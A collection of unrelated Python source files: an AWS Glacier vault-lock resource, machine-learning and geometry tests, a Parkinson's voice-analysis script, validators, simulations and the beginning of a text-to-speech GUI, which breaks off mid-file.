!> **WARNING:** Once a Glacier Vault Lock is completed, it is immutable. The deletion of the Glacier Vault Lock is not be possible and attempting to remove it from this provider will return an error. Set the `ignore_deletion_error` argument to `true` and apply this configuration before attempting to delete this resource via this provider or remove this resource from this provider's management.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] complete_lock: Boolean whether to permanently apply this Glacier Lock Policy. Once completed, this cannot be undone. If set to `false`, the Glacier Lock Policy remains in a testing mode for 24 hours. After that time, the Glacier Lock Policy is automatically removed by Glacier and the this provider resource will show as needing recreation. Changing this from `false` to `true` will show as resource recreation, which is expected. Changing this from `true` to `false` is not possible unless the Glacier Vault is recreated at the same time.
:param pulumi.Input[bool] ignore_deletion_error: Allow this provider to ignore the error returned when attempting to delete the Glacier Lock Policy. This can be used to delete or recreate the Glacier Vault via this provider, for example, if the Glacier Vault Lock policy permits that action. This should only be used in conjunction with `complete_lock` being set to `true`.
:param pulumi.Input[str] policy: JSON string containing the IAM policy to apply as the Glacier Vault Lock policy.
:param pulumi.Input[str] vault_name: The name of the Glacier Vault.
> This content is derived from https://github.com/terraform-providers/terraform-provider-aws/blob/master/website/docs/r/glacier_vault_lock.html.markdown.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
if complete_lock is None:
raise TypeError("Missing required property 'complete_lock'")
__props__['complete_lock'] = complete_lock
__props__['ignore_deletion_error'] = ignore_deletion_error
if policy is None:
raise TypeError("Missing required property 'policy'")
__props__['policy'] = policy
if vault_name is None:
raise TypeError("Missing required property 'vault_name'")
__props__['vault_name'] = vault_name
super(VaultLock, __self__).__init__(
'aws:glacier/vaultLock:VaultLock',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name, id, opts=None, complete_lock=None, ignore_deletion_error=None, policy=None, vault_name=None):
"""
Get an existing VaultLock resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param str id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] complete_lock: Boolean whether to permanently apply this Glacier Lock Policy. Once completed, this cannot be undone. If set to `false`, the Glacier Lock Policy remains in a testing mode for 24 hours. After that time, the Glacier Lock Policy is automatically removed by Glacier and the this provider resource will show as needing recreation. Changing this from `false` to `true` will show as resource recreation, which is expected. Changing this from `true` to `false` is not possible unless the Glacier Vault is recreated at the same time.
:param pulumi.Input[bool] ignore_deletion_error: Allow this provider to ignore the error returned when attempting to delete the Glacier Lock Policy. This can be used to delete or recreate the Glacier Vault via this provider, for example, if the Glacier Vault Lock policy permits that action. This should only be used in conjunction with `complete_lock` being set to `true`.
:param pulumi.Input[str] policy: JSON string containing the IAM policy to apply as the Glacier Vault Lock policy.
:param pulumi.Input[str] vault_name: The name of the Glacier Vault.
> This content is derived from https://github.com/terraform-providers/terraform-provider-aws/blob/master/website/docs/r/glacier_vault_lock.html.markdown.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["complete_lock"] = complete_lock
__props__["ignore_deletion_error"] = ignore_deletion_error
__props__["policy"] = policy
__props__["vault_name"] = vault_name
return VaultLock(resource_name, opts=opts, __props__=__props__)
def translate_output_property(self, prop):
return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
|
import collections
import gym
import numpy as np
class StateOccupancyCounter(gym.Wrapper):
def __init__(self, env):
super().__init__(env)
self.reset()
def reset(self):
self.state_occupancy_counts = collections.Counter()
obs = self.env.reset()
self.prev_obs_hash = None
self.update_state_occupancy_count(obs)
return obs
def step(self, action):
obs, rew, done, info = self.env.step(action)
occupancy_info = self.update_state_occupancy_count(obs)
info.update(occupancy_info)
return obs, rew, done, info
def compute_obs_hash(self, obs):
return hash(obs.tostring())
def update_state_occupancy_count(self, obs):
"""Updates the occupancy count and returns a dict of info."""
obs_hash = self.compute_obs_hash(obs)
matches_previous_obs = self.prev_obs_hash is not None and obs_hash == self.prev_obs_hash
self.state_occupancy_counts[obs_hash] += 1
self.prev_obs_hash = obs_hash
return {
"occupancy_count": self.state_occupancy_counts[obs_hash],
"num_unique_states": len(self.state_occupancy_counts),
"matches_previous_obs": matches_previous_obs
}
if __name__ == "__main__":
def time_function(f, num_iters, *args):
import sys
import time
start = time.time()
for itr in range(num_iters):
sys.stdout.write(f"\r{itr + 1} / {num_iters}")
f(*args)
end = time.time()
print(f"\nTook {end - start:0.4f} seconds")
import copy
num_imgs = 2048
height = 64
width = 64
channels = 6
num_iters = 100
import gym
env = gym.make("procgen:procgen-caveflyer-v0")
env = StateOccupancyCounter(env)
obs = []
x = env.reset()
obs.append(x)
infos = []
for i in range(1, num_imgs):
x, _, done, info = env.step(env.action_space.sample())
obs.append(x)
infos.append(info)
obs = np.array(obs)
counts = [i["occupancy_count"] for i in infos]
print(counts)
print(collections.Counter(counts))
import ipdb
ipdb.set_trace()
# def hash_obses(env, obs):
# for o in obs:
# env.compute_obs_hash(o)
# time_function(hash_obses, 4000, env, obs)
# imgs = result_a
# import matplotlib.pyplot as plt
# for ob, img in zip(obs, imgs):
# fig, axs = plt.subplots(2, 1, figsize=(16, 16))
# axs[0].imshow(ob[:, :, :3].detach().cpu().to(torch.uint8).numpy())
# axs[1].imshow(img[:, :, :3].detach().cpu().to(torch.uint8).numpy())
# plt.show()
|
#! /usr/bin/env python3
import argparse
import yaml
def merge_two_dict(d1, d2):
result = {}
for key in set(d1) | set(d2):
if isinstance(d1.get(key), dict) or isinstance(d2.get(key), dict):
result[key] = merge_two_dict(d1.get(key, dict()), d2.get(key, dict()))
else:
result[key] = d1.get(key, 0) + d2.get(key, 0)
return result
def merge_yaml_files(input_yamls, output_yaml):
output = {}
for input_yaml in input_yamls:
with open(input_yaml) as open_input:
data = yaml.safe_load(open_input) or {}
output = merge_two_dict(output, data)
with open(output_yaml, 'w') as open_output:
yaml.safe_dump(output, open_output)
def main():
description = ('Merge multiple yaml file containing stats by summing the overlapping fields')
parser = argparse.ArgumentParser(description=description)
parser.add_argument('--inputs', type=str, required=True, nargs='+',
help='YAML files containing the input summary metrics')
parser.add_argument('--output', type=str, required=True,
help='YAML files containing the output summary metrics')
args = parser.parse_args()
merge_yaml_files(args.inputs, args.output)
if __name__ == '__main__':
main()
|
"""
The Sims 4 Community Library is licensed under the Creative Commons Attribution 4.0 International public license (CC BY 4.0).
https://creativecommons.org/licenses/by/4.0/
https://creativecommons.org/licenses/by/4.0/legalcode
Copyright (c) COLONOLNUTTY
"""
from typing import Union
from sims4communitylib.enums.statistics_enum import CommonStatisticId
from statistics.statistic import Statistic
from sims4communitylib.utils.common_resource_utils import CommonResourceUtils
from sims4.resources import Types
class CommonStatisticUtils:
"""Utilities for manipulating Statistics.
"""
@staticmethod
def get_statistic_initial_value(statistic_id: Union[int, CommonStatisticId]) -> float:
"""get_statistic_initial_value(statistic_id)
Retrieve the Initial Value of a Statistic.
:param statistic_id: The identifier of the Statistic to use.
:type statistic_id: Union[int, CommonStatisticId]
:return: The initial value of the statistic.
:rtype: float
"""
statistic_instance = CommonStatisticUtils.load_statistic_by_id(statistic_id)
if statistic_instance is None:
return -1.0
if not hasattr(statistic_instance, 'get_initial_value'):
return statistic_instance.default_value
return statistic_instance.get_initial_value()
@staticmethod
def get_statistic_min_value(statistic_id: Union[int, CommonStatisticId]) -> float:
"""get_statistic_min_value(statistic_id)
Retrieve the Minimum Value of a Statistic.
:param statistic_id: The identifier of the Statistic to use.
:type statistic_id: Union[int, CommonStatisticId]
:return: The minimum value of the statistic.
:rtype: float
"""
statistic_instance = CommonStatisticUtils.load_statistic_by_id(statistic_id)
if statistic_instance is None:
return -1.0
return statistic_instance.min_value
@staticmethod
def get_statistic_max_value(statistic_id: Union[int, CommonStatisticId]) -> float:
"""get_statistic_max_value(statistic_id)
Retrieve the Maximum Value of a Statistic.
:param statistic_id: The identifier of the Statistic to use.
:type statistic_id: Union[int, CommonStatisticId]
:return: The maximum value of the statistic.
:rtype: float
"""
statistic_instance = CommonStatisticUtils.load_statistic_by_id(statistic_id)
if statistic_instance is None:
return -1.0
return statistic_instance.max_value
@staticmethod
def load_statistic_by_id(statistic_id: Union[int, CommonStatisticId]) -> Union[Statistic, None]:
"""load_statistic(statistic_id)
Load an instance of a Statistic by its decimal identifier.
:param statistic_id: The decimal identifier of a Statistic.
:type statistic_id: Union[int, CommonStatisticId]
:return: An instance of a Statistic matching the decimal identifier or None if not found.
:rtype: Union[Statistic, None]
"""
return CommonResourceUtils.load_instance(Types.STATISTIC, statistic_id)
|
def printStudentDetails(name, age, marks, stream):
print('Student details')
print('Name: {}, Age: {}, Marks: {}, Stream: {}'.format(
name, age, marks, stream
))
printStudentDetails('pema', 28, 300, 'Datasci')
#unpacking
d = {'name': "john", "stream": "ece", 'age': 17, 'marks': 700}
printStudentDetails(**d)
# printStudentDetails(*d) is not the right way
|
from botlang.evaluation.values import ReturnNode
def return_node(environment, inner_node):
try:
environment.lookup(Slots.DIGRESSION_RETURN)
except NameError:
return inner_node
else:
return ReturnNode(inner_node)
def is_disgression(environment):
return Slots.digression_started(environment)
class Slots(object):
CURRENT_SLOTS_NODE = '__CURRENT_SLOTS_NODE__'
DIGRESSION_RETURN = '__DIGRESSION_RETURN_NODE__'
SLOTS_FUNCTIONS = {
'digression?': is_disgression,
'return': return_node
}
@classmethod
def get_base_environment(cls, environment):
base_env = environment
while base_env.previous is not None:
base_env = base_env.previous
return base_env
@classmethod
def digression_started(cls, environment):
base_env = cls.get_base_environment(environment)
return base_env.bindings.get(Slots.DIGRESSION_RETURN, False)
@classmethod
def start_digression(cls, environment):
base_env = cls.get_base_environment(environment)
base_env.bindings[Slots.DIGRESSION_RETURN] = True
@classmethod
def end_digression(cls, environment):
base_env = cls.get_base_environment(environment)
del base_env.bindings[Slots.DIGRESSION_RETURN]
|
#Test001.py
def HelloWorld():
print ("Hello World")
def add(a, b):
return a+b
def TestDict(dict):
print (dict)
dict["Age"] = 17
return dict
class Person:
def greet(self, greetStr):
print (greetStr)
#print add(5,7)
#a = raw_input("Enter To Continue...")
|
# -*- coding: utf-8 -*-
"""
Created on Sat Jul 4 02:33:34 2020
@author: Admin
"""
import pandas as pd
import numpy as np
import parselmouth
from parselmouth.praat import call
import nolds
from scipy import signal
from scipy.io import wavfile
from pyentrp import entropy
import sys
def measurePitch(voiceID, f0min, f0max, unit):
sound = parselmouth.Sound(voiceID) # read the sound
pitch = call(sound, "To Pitch", 0.0, f0min, f0max) #create a praat pitch object
meanF0 = call(pitch, "Get mean", 0, 0, unit) # get mean pitch
stdevF0 = call(pitch, "Get standard deviation", 0 ,0, unit) # get standard deviation
#harmonicity = call(sound, "To Harmonicity (cc)", 0.01, 75, 0.1, 1.0)
#hnr = call(harmonicity, "Get mean", 0, 0)
pointProcess = call(sound, "To PointProcess (periodic, cc)", f0min, f0max)
localJitter = call(pointProcess, "Get jitter (local)", 0, 0, 0.0001, 0.02, 1.3)
localabsoluteJitter = call(pointProcess, "Get jitter (local, absolute)", 0, 0, 0.0001, 0.02, 1.3)
rapJitter = call(pointProcess, "Get jitter (rap)", 0, 0, 0.0001, 0.02, 1.3)
ppq5Jitter = call(pointProcess, "Get jitter (ppq5)", 0, 0, 0.0001, 0.02, 1.3)
ddpJitter = call(pointProcess, "Get jitter (ddp)", 0, 0, 0.0001, 0.02, 1.3)
localShimmer = call([sound, pointProcess], "Get shimmer (local)", 0, 0, 0.0001, 0.02, 1.3, 1.6)
localdbShimmer = call([sound, pointProcess], "Get shimmer (local_dB)", 0, 0, 0.0001, 0.02, 1.3, 1.6)
apq3Shimmer = call([sound, pointProcess], "Get shimmer (apq3)", 0, 0, 0.0001, 0.02, 1.3, 1.6)
aqpq5Shimmer = call([sound, pointProcess], "Get shimmer (apq5)", 0, 0, 0.0001, 0.02, 1.3, 1.6)
apq11Shimmer = call([sound, pointProcess], "Get shimmer (apq11)", 0, 0, 0.0001, 0.02, 1.3, 1.6)
ddaShimmer = call([sound, pointProcess], "Get shimmer (dda)", 0, 0, 0.0001, 0.02, 1.3, 1.6)
voice_report = call([sound,pitch,pointProcess], "Voice report", 0.0, 0.0, f0min, f0max, 1.3, 1.6, 0.03, 0.45)
return meanF0, stdevF0, localJitter, localabsoluteJitter, rapJitter, ppq5Jitter, ddpJitter, localShimmer, localdbShimmer, apq3Shimmer, aqpq5Shimmer, apq11Shimmer, ddaShimmer, voice_report
AudioFile_path = sys.argv[1]
sample_rate, samples = wavfile.read(AudioFile_path)
frequencies, times, spectogram = signal.spectrogram(samples, sample_rate)
sound = parselmouth.Sound(AudioFile_path)
DFA = nolds.dfa(times)
PPE = entropy.shannon_entropy(times)
(meanF0, stdevF0, localJitter, localabsoluteJitter, rapJitter, ppq5Jitter, ddpJitter, localShimmer, localdbShimmer, apq3Shimmer, aqpq5Shimmer, apq11Shimmer, ddaShimmer, voice_report) = measurePitch(sound, 75, 500, "Hertz")
voice_report = voice_report.strip()
hnr = voice_report[984:989]
nhr = voice_report[941:953]
# from sklearn.preprocessing import MinMaxScaler
# sc = MinMaxScaler()
# DFA = sc.fit_transform(DFA)
# PPE = sc.fit_transform(PPE)
df_1 = pd.DataFrame(np.column_stack([localJitter,localabsoluteJitter,rapJitter,ppq5Jitter,ddpJitter,localShimmer,localdbShimmer,apq3Shimmer,aqpq5Shimmer,apq11Shimmer,ddaShimmer,nhr,hnr,DFA,PPE]),
columns=['Jitter(%)','Jitter(Abs)','Jitter:RAP','Jitter:PPQ5','Jitter:DDP','Shimmer','Shimmer(dB)','Shimmer:APQ3','Shimmer:APQ5','Shimmer:APQ11','Shimmer:DDA','NHR','HNR','DFA','PPE'])
df = pd.read_csv('C:/Users/Admin/BE Project/FINAL_YEAR_PROJECT-master//PDProject/Net_Model/parkinson_dataset_1.csv')
X = df.iloc[:, 6:21].values
Y = df.iloc[:, 4:6].values
vertical_stack = pd.concat([df.iloc[:, 6:21], df_1], axis=0)
X_new = vertical_stack.iloc[:, 0:15].values
from sklearn.preprocessing import MinMaxScaler
sc = MinMaxScaler()
X_new = sc.fit_transform(X_new)
y_new = sc.fit_transform(Y)
import keras
from keras.models import load_model
best_model = load_model('C:/Users/Admin/BE Project/FINAL_YEAR_PROJECT-master//PDProject/Net_Model/weights-improvement-998-0.0021.hdf5',compile=False)
Y = best_model.predict(X_new[5874:5875])
Y_pred_org = sc.inverse_transform(Y)
MOTOR_UPDRS = Y_pred_org[0][0]
TOTAL_UPDRS = Y_pred_org[0][1]
Result = "Patient's Motor Updrs Value : %s and Total Updrs Value : %s" %(MOTOR_UPDRS,TOTAL_UPDRS)
print(Result) |
"""Unit tests for the KDE classifier."""
import geomstats.backend as gs
import geomstats.tests
from geomstats.geometry.euclidean import Euclidean
from geomstats.geometry.hyperboloid import Hyperboloid
from geomstats.geometry.hypersphere import Hypersphere
from geomstats.geometry.poincare_ball import PoincareBall
from geomstats.learning.kernel_density_estimation_classifier import \
KernelDensityEstimationClassifier
from geomstats.learning.radial_kernel_functions import triangular_radial_kernel
class TestKernelDensityEstimationClassifier(geomstats.tests.TestCase):
"""Class defining the Kernel Density Estimation Classifier tests."""
def setUp(self):
"""Define the parameters to test."""
gs.random.seed(1234)
self.dim = 2
self.space = Euclidean(dim=self.dim)
self.distance = self.space.metric.dist
def test_predict(self):
"""Test the 'predict' class method."""
training_dataset = gs.array(
[[0.0, 0.0],
[1.0, 0.0],
[2.0, 0.0],
[3.0, 0.0]])
labels = [0, 0, 1, 1]
kde = KernelDensityEstimationClassifier(distance=self.distance)
kde.fit(training_dataset, labels)
result = kde.predict(gs.array([[1.1, 0.0]]))
expected = gs.array([0])
self.assertAllClose(expected, result)
def test_predict_one_dimensional_data(self):
"""Test the 'predict' class method."""
training_dataset = gs.array(
[[0.0],
[1.0],
[2.0],
[3.0]])
labels = [0, 0, 1, 1]
kde = KernelDensityEstimationClassifier(
distance='minkowski')
kde.fit(training_dataset, labels)
result = kde.predict(gs.array([1.1]))
expected = gs.array([0])
self.assertAllClose(expected, result)
@geomstats.tests.np_only
def test_predict_one_dimensional_data_callable_distance(self):
"""Test the 'predict' class method on one dimensional data."""
training_dataset = gs.array([0, 1, 2, 3])
labels = [0, 0, 1, 1]
kde = KernelDensityEstimationClassifier(
distance=self.distance)
kde.fit(training_dataset, labels)
result = kde.predict(gs.array([1.1]))
expected = gs.array([0])
self.assertAllClose(expected, result)
@geomstats.tests.np_only
def test_predict_proba_uniform_kernel_one_dimensional_data(self):
"""Test the 'predict_proba' class method using the 'uniform' kernel.
Test the 'predict_proba' class method using the 'uniform' kernel on
one-dimensional date of shape [n_samples,].
"""
training_dataset = gs.array([0, 1, 2, 3])
labels = [0, 0, 1, 1]
kde = KernelDensityEstimationClassifier(
kernel='uniform',
distance=self.distance)
kde.fit(training_dataset, labels)
result = kde.predict_proba(gs.array([0.9]))
expected = gs.array([[1 / 2, 1 / 2]])
self.assertAllClose(expected, result, atol=gs.atol)
def test_predict_proba_uniform_kernel(self):
"""Test the 'predict_proba' class method using the 'uniform' kernel."""
training_dataset = gs.array(
[[0.0, 0.0],
[1.0, 0.0],
[2.0, 0.0],
[3.0, 0.0]])
labels = [0, 0, 1, 1]
kde = KernelDensityEstimationClassifier(
kernel='uniform',
distance=self.distance)
kde.fit(training_dataset, labels)
result = kde.predict_proba(gs.array([[0.9, 0.0]]))
expected = gs.array([[1 / 2, 1 / 2]])
self.assertAllClose(expected, result, atol=gs.atol)
def test_predict_proba_distance_kernel(self):
"""Test the 'predict_proba' class method using 'distance' kernel."""
training_dataset = gs.array(
[[0.0, 0.0],
[1.0, 0.0],
[2.0, 0.0],
[3.0, 0.0]])
labels = [0, 0, 1, 1]
kde = KernelDensityEstimationClassifier(
kernel='distance',
distance=self.distance)
kde.fit(training_dataset, labels)
result = kde.predict_proba(gs.array([[1.0, 0.0]]))
expected = gs.array([[1, 0]])
self.assertAllClose(expected, result, atol=gs.atol)
@geomstats.tests.np_and_pytorch_only
def test_predict_proba_triangular_kernel(self):
"""Test the 'predict_proba' class method using a triangular kernel."""
training_dataset = gs.array(
[[0.0, 0.0],
[1.0, 0.0],
[2.0, 0.0],
[3.0, 0.0]])
labels = [0, 0, 1, 1]
kde = KernelDensityEstimationClassifier(
kernel=triangular_radial_kernel,
bandwidth=2.0,
p=2,
distance='minkowski')
kde.fit(training_dataset, labels)
result = kde.predict_proba(gs.array([[1.0, 0.0]]))
expected = gs.array([[3 / 4, 1 / 4]])
self.assertAllClose(expected, result, atol=gs.atol)
@geomstats.tests.np_and_pytorch_only
def test_predict_proba_triangular_kernel_callable_distance(self):
"""Test the 'predict_proba' class method using a triangular kernel."""
training_dataset = gs.array(
[[0.0, 0.0],
[1.0, 0.0],
[2.0, 0.0],
[3.0, 0.0]])
labels = [0, 0, 1, 1]
kde = KernelDensityEstimationClassifier(
kernel=triangular_radial_kernel,
bandwidth=2.0,
distance=self.distance)
kde.fit(training_dataset, labels)
result = kde.predict_proba(gs.array([[1.0, 0.0]]))
expected = gs.array([[3 / 4, 1 / 4]])
self.assertAllClose(expected, result, atol=gs.atol)
@geomstats.tests.np_and_pytorch_only
def test_predict_triangular_kernel_callable_distance(self):
"""Test the 'predict' class method using a triangular kernel."""
training_dataset = gs.array(
[[0.0, 0.0],
[1.0, 0.0],
[2.0, 0.0],
[3.0, 0.0]])
labels = [0, 0, 1, 1]
kde = KernelDensityEstimationClassifier(
kernel=triangular_radial_kernel,
bandwidth=2.0,
distance=self.distance)
kde.fit(training_dataset, labels)
result = kde.predict(gs.array([[1.0, 0.0], [1.0, 0.0]]))
expected = gs.array([0, 0])
self.assertAllClose(expected, result, atol=gs.atol)
def test_predict_hypersphere_distance(self):
"""Test the 'predict' class method using the hypersphere distance."""
dim = 2
space = Hypersphere(dim=dim)
distance = space.metric.dist
training_dataset = gs.array(
[[1, 0, 0],
[3 ** (1 / 2) / 2, 1 / 2, 0],
[3 ** (1 / 2) / 2, - 1 / 2, 0],
[0, 0, 1],
[0, 1 / 2, 3 ** (1 / 2) / 2],
[0, - 1 / 2, 3 ** (1 / 2) / 2]])
labels = [0, 0, 0, 1, 1, 1]
kde = KernelDensityEstimationClassifier(
distance=distance)
kde.fit(training_dataset, labels)
target_dataset = gs.array(
[[2 ** (1 / 2) / 2, 2 ** (1 / 2) / 2, 0],
[0, 1 / 2, - 3 ** (1 / 2) / 2],
[0, - 1 / 2, - 3 ** (1 / 2) / 2],
[- 3 ** (1 / 2) / 2, 1 / 2, 0],
[- 3 ** (1 / 2) / 2, - 1 / 2, 0],
[0, 2 ** (1 / 2) / 2, 2 ** (1 / 2) / 2]])
result = kde.predict(target_dataset)
expected = [0, 0, 0, 1, 1, 1]
self.assertAllClose(expected, result)
def test_predict_poincare_ball_distance(self):
"""Test the 'predict' class method using the Poincare ball distance."""
dim = 2
space = PoincareBall(dim=dim)
distance = space.metric.dist
training_dataset = gs.array(
[[1 / 2, 1 / 4],
[1 / 2, 0],
[1 / 2, - 1 / 4],
[- 1 / 2, 1 / 4],
[- 1 / 2, 0],
[- 1 / 2, - 1 / 4]])
labels = [0, 0, 0, 1, 1, 1]
kde = KernelDensityEstimationClassifier(
distance=distance,
kernel='distance')
kde.fit(training_dataset, labels)
target_dataset = gs.array(
[[1 / 2, 1 / 5],
[1 / 2, 0],
[1 / 2, - 1 / 5],
[- 1 / 2, 1 / 5],
[- 1 / 2, 0],
[- 1 / 2, - 1 / 5]])
result = kde.predict(target_dataset)
expected = [0, 0, 0, 1, 1, 1]
self.assertAllClose(expected, result)
def test_predict_hyperboloid_distance(self):
"""Test the 'predict' class method using the hyperboloid distance."""
dim = 2
space = Hyperboloid(dim=dim)
distance = space.metric.dist
training_dataset_intrinsic = gs.array(
[[1 / 2, 1 / 4],
[1 / 2, 0],
[1 / 2, - 1 / 4],
[- 1 / 2, 1 / 4],
[- 1 / 2, 0],
[- 1 / 2, - 1 / 4]])
training_dataset = space.change_coordinates_system(
training_dataset_intrinsic,
from_coordinates_system='intrinsic',
to_coordinates_system='extrinsic')
labels = [0, 0, 0, 1, 1, 1]
kde = KernelDensityEstimationClassifier(
distance=distance,
kernel='distance')
kde.fit(training_dataset, labels)
target_dataset_intrinsic = gs.array(
[[1 / 2, 1 / 5],
[1 / 2, 0],
[1 / 2, - 1 / 5],
[- 1 / 2, 1 / 5],
[- 1 / 2, 0],
[- 1 / 2, - 1 / 5]])
target_dataset = space.change_coordinates_system(
target_dataset_intrinsic,
from_coordinates_system='intrinsic',
to_coordinates_system='extrinsic')
result = kde.predict(target_dataset)
expected = [0, 0, 0, 1, 1, 1]
self.assertAllClose(expected, result)
|
description = 'Verify the user can add an action to a test and save it successfully'
pages = ['common',
'index',
'tests',
'test_builder']
def setup(data):
common.access_golem(data.env.url, data.env.admin)
index.create_access_project('test')
common.navigate_menu('Tests')
tests.create_access_random_test()
def test(data):
test_builder.add_action(data.action)
test_builder.save_test()
refresh_page()
test_builder.verify_last_action(data.action)
|
# -*- encode: utf-8 -*-
from random import random, choice, choices
from tqdm import tqdm
from models import Context, Aircraft, Airport, City, Time
from data import context, cities, airline, t
from settings import randbool, randgauss, path_number, aircraft_number, people_number_ratio
population = {}
for city in cities:
for airport in city.airports:
population[airport] = [0] * t.DAY*t.HOUR*t.MINUTE
for i in tqdm(range(t.DAY*t.HOUR*t.MINUTE), ascii=True):
# for i in range(t.DAY*t.HOUR*t.MINUTE):
t.elapse()
paths = choices(list(airline), k=path_number(t.is_day()))
for path in paths:
aircrafts = []
if randbool(): path=path[::-1]
number = aircraft_number(t.is_day())
path_ = choice(path[0].airports), choice(path[1].airports)
if (len(list(path_[0].filter(t.is_active))) >= number) \
and (path_[1].capacity-path_[1].aircraft_number > number) \
and number != 0:
times = path_[0].aircraft_leave_for_times(path_[1], number)
for key, val in times.items():
aircrafts.append(key)
t.sleep(key, val)
for aircraft in aircrafts:
population[path_[1]][i] = round(people_number_ratio() * aircraft.capacity)
|
# -*- coding: utf-8 -*-
#
# Copyright 2014 Jaime Gil de Sagredo Luna
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The `validators` module contains a set of :mod:`fields` validators.
A validator is any callable `object` which receives a `value` as the
target for the validation. If the validation fails then should raise an
:class:`errors.ValidationError` exception with an error message.
`Validators` are passed to :class:`fields.Field` and subclasses as possitional
arguments.
"""
import re
import collections
import datetime
from booby import errors
from booby.helpers import nullable
class Validator(object):
def __call__(self, value):
self.validate(value)
def validate(self, value):
raise NotImplementedError()
class Required(Validator):
"""This validator forces fields to have a value other than :keyword:`None`."""
def validate(self, value):
if value is None:
raise errors.ValidationError('is required')
class In(Validator):
"""This validator forces fields to have their value in the given list.
:param choices: A `list` of possible values.
"""
def __init__(self, choices):
self.choices = choices
def validate(self, value):
if value not in self.choices:
raise errors.ValidationError('should be in {}'.format(self.choices))
class String(Validator):
"""This validator forces fields values to be an instance of `basestring`."""
@nullable
def validate(self, value):
if not isinstance(value, str):
raise errors.ValidationError('should be a string')
class Integer(Validator):
"""This validator forces fields values to be an instance of `int`."""
@nullable
def validate(self, value):
if not isinstance(value, int):
raise errors.ValidationError('should be an integer')
class Float(Validator):
"""This validator forces fields values to be an instance of `float`."""
@nullable
def validate(self, value):
if not isinstance(value, float):
raise errors.ValidationError('should be a float')
class Boolean(Validator):
"""This validator forces fields values to be an instance of `bool`."""
@nullable
def validate(self, value):
if not isinstance(value, bool):
raise errors.ValidationError('should be a boolean')
class Model(Validator):
"""This validator forces fields values to be an instance of the given
:class:`models.Model` subclass and also performs a validation in the
entire `model` object.
:param model: A subclass of :class:`models.Model`
"""
def __init__(self, model):
self.model = model
@nullable
def validate(self, value):
if not isinstance(value, self.model):
raise errors.ValidationError(
"should be an instance of '{}'".format(self.model.__name__))
value.validate()
class Email(String):
"""This validator forces fields values to be strings and match a
valid email address.
"""
def __init__(self):
super(Email, self).__init__()
self.pattern = re.compile('^[^@]+\@[^@]+$')
@nullable
def validate(self, value):
super(Email, self).validate(value)
if self.pattern.match(value) is None:
raise errors.ValidationError('should be a valid email')
class List(Validator):
"""This validator forces field values to be a :keyword:`list`.
Also a list of inner :mod:`validators` could be specified to validate
each list element. For example, to validate a list of
:class:`models.Model` you could do::
books = fields.Field(validators.List(validators.Model(YourBookModel)))
:param \*validators: A list of inner validators as possitional arguments.
"""
def __init__(self, *validators):
self.validators = validators
@nullable
def validate(self, value):
if not isinstance(value, collections.MutableSequence):
raise errors.ValidationError('should be a list')
for i in value:
for validator in self.validators:
validator(i)
class DateTime(Validator):
@nullable
def validate(self, value):
if not isinstance(value, datetime.datetime):
raise errors.ValidationError('should be a datetime')
|
import sys
import os
from PyQt5.QtWidgets import QMainWindow, QApplication, QWidget, QPushButton, QCheckBox, QLineEdit, QMessageBox, QComboBox, QLabel, QFileDialog
from PyQt5.QtGui import QIcon
from PyQt5.QtCore import pyqtSlot, QUrl
import sounddevice as sd
# from paddle
import argparse
from pathlib import Path
import numpy as np
import paddle
import soundfile as sf
import yaml
from yacs.config import CfgNode
import sys
sys.path.append("train/frontend")
# from zh_frontend import Frontend
from mixed_frontend import Frontend
sys.path.append("train/models")
from fastspeech2 import FastSpeech2
from speedyspeech import SpeedySpeech
# from paddlespeech.t2s.models.fastspeech2 import FastSpeech2
# from paddlespeech.t2s.models.fastspeech2 import StyleFastSpeech2Inference
from fastspeech2 import StyleFastSpeech2Inference
from speedyspeech import SpeedySpeechInference
from paddlespeech.t2s.models.hifigan import HiFiGANInference
from paddlespeech.t2s.models.parallel_wavegan import PWGInference
import paddlespeech.t2s.models as ttsModels
from paddlespeech.t2s.modules.normalizer import ZScore
from paddlespeech.t2s.datasets.get_feats import LogMelFBank
import librosa
from sklearn.preprocessing import StandardScaler
class App(QMainWindow):
def __init__(self):
super().__init__()
self.title = 'VTuberTalk'
self.left = 10
self.top = 10
self.width = 400
self.height = 320
self.initUI()
self.initModel()
def initUI(self):
self.setWindowTitle(self.title)
self.setGeometry(self.left, self.top, self.width, self.height)
# Create textbox
self.textbox = QLineEdit(self)
self.textbox.move(20, 20)
self.textbox.resize(360, 40)
# generate button
self.generate_button = QPushButton('合成', self)
self.generate_button.move(20, 80)
self.generate_button.clicked.connect(self.onGenerateButtonClicked)
# play button
self.play_button = QPushButton('重播', self)
self.play_button.move(20, 120)
self.play_button.clicked.connect(self.playAudioFile)
# save button
self.save_button = QPushButton('保存', self)
self.save_button.move(20, 160)
self.save_button.clicked.connect(self.saveWavFile)
# voice combobox
self.voice_label = QLabel(self)
self.voice_label.move(160, 80)
self.voice_label.setText("声音:")
self.voice_combo = QComboBox(self)
self.voice_combo.addItem("阿梓")
self.voice_combo.addItem("海子姐")
self.voice_combo.move(240, 80)
self.voice_combo.resize(120, 40)
self.voice_combo.activated[str].connect(self.onVoiceComboboxChanged)
# tts model
